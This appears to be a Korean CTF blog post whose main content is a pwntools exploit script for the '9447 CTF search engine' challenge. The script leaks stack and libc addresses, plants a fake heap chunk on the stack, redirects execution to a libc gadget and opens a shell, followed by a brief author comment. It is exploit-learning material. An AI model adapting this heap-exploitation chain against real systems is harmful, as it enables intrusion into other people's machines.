from pwn import *

from hexdump import *


import time


p = process("./search")


def stack_leak():

p.sendline("A" * 48)

p.sendline("B" * 48)


p.recvuntil("B" * 48)


stack_base = u64(p.recv(6) + "\x00\x00")

log.info("stack: " + hex(stack_base + 32))


return stack_base


def index(data):

p.sendline("2")

p.sendline(str(len(data)))

time.sleep(0.1)

p.sendline(data)


p.recvuntil("Quit\n")


def search(data, delete = False):

p.sendline("1")

p.sendline(str(len(data)))

time.sleep(0.1)

p.sendline(data)


while True:

if p.recvuntil("Found", timeout = 0.8) is not  "":

if delete == True:

p.sendline("y")

else:

p.sendline("n")

elif p.recvuntil("Found", timeout = 1.0) is "":

break


p.recvuntil("Quit\n")


def heap_leak(data):

p.sendline("1")

p.sendline("6")

p.sendline(data)


p.recvuntil("Found 32: ")


heaptr = u64(p.recv(4) + "\x00" * 4)

heap_base = heaptr & ~0xff

log.info("heap base: " + hex(heap_base))


p.sendline("n")


p.recvuntil("Quit\n")


return heap_base


def libc_leak(data):

p.sendline("1")

p.sendline(str(len(data)))

p.sendline(data)


p.recvuntil("Found 512: ")


libc_leak = u64(p.recv(6) + "\x00\x00")

libc_base = libc_leak - 0x2047b8 - 0x1ba000

log.info("libc base: " + hex(libc_base))


p.sendline("n")

p.sendline("n")

p.sendline("n")


p.recvuntil("Quit\n")


return libc_base


def pwn(stack_base, libc_base):

index("A" * 51 + " some")

index("B" * 51 + " some")

index("C" * 51 + " some")


search("some", delete = True)


p.sendline("1")

p.sendline("4")

p.sendline("\0" * 4)

p.sendline("y")

p.sendline("n")

p.recvuntil("Quit\n")


index(p64(stack_base + 0x52).ljust(50, "\0") + " pwned")


index("D" * 50 + " pwend")

index("E" * 50 + " pwned")


index("W" * 6 + p64(0x400896) * 3 + p64(libc_base + 0x4647C).ljust(56, "G"))


#p.sendline("3")

p.interactive()


def main():

stack_base = stack_leak()


index("A" * 25 + " plays")

index("B" * 25 + " plays")

index("C" * 32)


search("plays", delete = True)


#heap_base = heap_leak("\0" * 6)


index(("A" * 256 + " pwning ").ljust(512, "B"))


search("pwning", delete = True)


libc_base = libc_leak("\0" * 6)


pwn(stack_base, libc_base)


if __name__ =='__main__':

main()


문제 진짜 잘 만든거 같다. 


fake chunk 만드는 거 잘 안되서 와업 보고 풀었는데 내일 이거 다시 짜봐야겠다. 흠....

'Pwned > CTF' 카테고리의 다른 글

codegate 2017 messenger  (0) 2017.02.15
codegate 2017 babypwn  (0) 2017.02.14
9447 CTF search engine  (0) 2017.01.11
2016 chrismas ctf who is solo  (0) 2017.01.10
H3XOR CTF ezheap  (0) 2017.01.08
H3XOR CTF Be rich  (0) 2017.01.07

+ Recent posts